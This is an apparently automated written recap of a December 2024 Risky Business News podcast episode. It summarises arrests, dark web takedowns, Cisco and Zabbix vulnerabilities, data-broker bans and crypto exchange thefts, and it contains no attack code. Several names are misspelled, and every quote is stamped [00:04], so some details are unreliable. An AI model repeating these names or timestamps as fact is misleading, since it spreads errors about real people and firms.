Risky Business News: Poland Arrests Former Spy Chief in Pegasus Scandal

Release Date: December 4, 2024
Host: Claire
Prepared by: Catalyn Kimpanu

1. Poland Detains Former Spy Chief Over Pegasus Surveillance

In a significant development, the Polish government has apprehended Piotr Poganowski, the former head of Poland's internal security agency (ABW), to testify regarding the use of Pegasus spyware. Poganowski, who led the agency from 2016 to 2020, authorized the acquisition and deployment of NSO Group's Pegasus software to monitor opposition leaders, journalists, and prosecutors investigating government corruption. This action marks the first instance in Poland's history where a witness was compelled to appear before an inquiry.

Claire notes at [00:04] “Poland arrests its former spy chief in the Pegasus investigation... this marks the first time in the country's history when a witness has been forced to appear for an inquiry.”

2. Germany Forms Task Force to Combat Disinformation and Espionage

Amid rising concerns over election interference, Germany has established a specialized task force within the Federal Office for the Protection of the Constitution. This unit aims to counteract disinformation and espionage campaigns, primarily attributing the surge to Russian efforts to influence the upcoming snap elections scheduled for February next year. The agency highlights that Russia has intensified its information warfare tactics, including cyberattacks and real-world sabotage, to bolster pro-Russian and anti-EU candidates.

3. Europol Shuts Down the Matrix Cryptocoms Platform

European law enforcement has successfully dismantled Matrix, an encrypted messaging service utilized by criminal organizations. The operation, which commenced earlier this year, involved seizing control of the platform and intercepting communications over three months. The takedown led to coordinated arrests across multiple jurisdictions. The investigation was triggered when Dutch authorities identified the Matrix app on a criminal involved in the murder of a Dutch journalist. It is important to distinguish this criminal platform from the similarly named Matrix Open Source Communications Protocol.

4. Crime Network: Largest German Dark Web Marketplace Taken Down

German authorities have closed down Crime Network, the most extensive dark web marketplace catering to German-speaking users. Operating since 2012, the platform facilitated the trade of stolen data, drugs, and counterfeit documents, boasting over 100,000 users and more than 100 verified sellers. Officials reported that Crime Network generated over €93 million in illegal transactions over six years before its closure.

5. Russian Court Sentences Hydra Market Founder to Life Imprisonment

In Moscow, Stanislav Moyatsev, the founder of the Hydra dark web marketplace, has been sentenced to life in prison. Moyatsev and 15 accomplices managed Hydra from 2015 until its seizure by German authorities in 2022. The group was a significant player in the European and Russian drug trade. The court also handed down sentences ranging from eight to twenty-three years for his associates. Russian officials announced the seizure of a substantial quantity of narcotics during raids on Moyatsev's residence.

6. Cisco Addresses Exploitation of 2014 ASA Firewall Vulnerability

Cisco has reported that threat actors are exploiting a long-standing vulnerability in its ASA firewalls, specifically a cross-site scripting (XSS) bug in the ASA WebVPN login page. This flaw allows attackers to execute arbitrary JavaScript by deceiving users into clicking malicious links, potentially leading to credential theft. According to Claire at [00:04], “Attackers can execute JavaScript by tricking a user into clicking a link, which could lead to credential theft.” Cisco indicates that these attacks began last month.

7. Critical SQL Injection Vulnerability Found in Zabbix Monitoring Platform

Security researchers at Qualys have uncovered a severe SQL injection vulnerability in Zabbix, an open-source monitoring solution. Rated 9.9 out of 10 in severity, the flaw permits remote attackers to commandeer Zabbix servers via the platform's API. A patch was released by Zabbix last week. Qualys estimates that over 83,000 Zabbix servers remain exposed to this threat.

8. FTC Bans US Data Brokers Mobile Waller and Ventel from Selling Location Data

The US Federal Trade Commission (FTC) has taken decisive action against Mobile Waller and its subsidiary Ventel, prohibiting them from selling users' geolocation data. The crackdown follows revelations that these companies collected and sold sensitive information without customer consent, including data pertaining to military sites, churches, labor unions, and other protected locations. Claire highlights at [00:04], “The FTC cracked down on the three companies after they were caught collecting and selling data without their customers consent.” Mobile Waller was specifically cited for selling geolocation data to identify individuals visiting pregnancy centers and participants in George Floyd protests.

9. Amazon Introduces AWS Data Transfer Terminal for Secure Data Uploads

Amazon has launched the AWS Data Transfer Terminal, a new feature enabling customers to upload data to the AWS cloud through secure physical terminals located in select locations. Designed for scenarios requiring secure uploads or large data transfers that are impractical over network connections, the initial terminals are available in Los Angeles and New York, with plans for expansion next year.

10. Ransomware Attack Disrupts Costa Rica’s Recope Operations

Recope, Costa Rica's largest oil refinery, has been significantly impacted by a ransomware attack, forcing the company to switch to manual operations. The refinery is now overseeing tanker refueling without relying on its usual software systems. Recope's management has engaged "American Experts" to assist in recovering the affected systems, though it remains unclear whether these experts are affiliated with a private firm or the US government. As Central America's leading fossil fuel importer, refiner, and distributor, this disruption poses substantial operational challenges.

11. Scynzy Experiences Security Breach Affecting Customer Data

KYC (Know Your Customer) service provider Scynzy has reported a security breach resulting in some customer data appearing on hacking forums. The incident occurred after an employee's device was infected by an information stealer malware. Scynzy is currently investigating the extent and implications of the breach. According to Claire at [00:04], “According to TechCrunch, the breach occurred after one of the company's employees got infected by an info stealer.” The Indian-based company serves over 600 financial institutions globally.

12. Japanese Crypto Exchange DMM Bitcoin Ceases Operations Following $305 Million Hack

DMM Bitcoin, a prominent Japanese cryptocurrency exchange, has shut down operations in the wake of a massive security breach that resulted in the theft of approximately $305 million in late May. This incident is recognized as the eighth largest crypto heist to date. DMM has sold its customer accounts and assets to a holding corporation and had previously assured customers of full reimbursement for all stolen assets.

13. XD Cryptocurrency Exchange Halts Transactions After $1.7 Million Theft

XD cryptocurrency exchange has suspended all transactions as it investigates a security breach through which threat actors are believed to have stolen around $1.7 million worth of tokens via an unidentified vector. The platform asserts that it maintains sufficient reserves to reimburse AFF users despite the incident.

14. Clipper Dex Suffers $500,000 Crypto Token Theft via API Exploit

A vulnerability in the API of the Clipper Dex exchange has been exploited by a threat actor, resulting in the theft of nearly $500,000 worth of TVL crypto tokens. This amount represents approximately 6% of the total circulating TVL tokens. In response, Clipper Dex has paused all operations to thoroughly investigate the attack.

15. Apple Faces Lawsuit Over Alleged Employee Monitoring Practices

An Apple employee, Amar Bakhta from the advertising division, has filed a lawsuit against the company alleging unauthorized monitoring of personal devices and iCloud accounts. The lawsuit claims that Apple mandates employees who use personal devices for work to install software that tracks all activities, including periods when employees are off duty or have left the company.

16. Riot Games Offers $100,000 Rewards for Cracking Vanguard Anti-Cheat System

Riot Games has announced a $100,000 bounty for security researchers who can successfully crack Vanguard, the company’s anti-cheat system. Additionally, a similar reward is offered for any exploits capable of disrupting or launching denial-of-service attacks against individual players. This initiative follows updates to Riot’s bug bounty program, prompted by previous exploits targeting Activision and EA Games earlier in the year.

This comprehensive summary of the December 4th, 2024 episode of Risky Business News provides an in-depth overview of the latest cybersecurity developments, ensuring that even those who haven't listened to the podcast remain well-informed on critical issues affecting the digital landscape.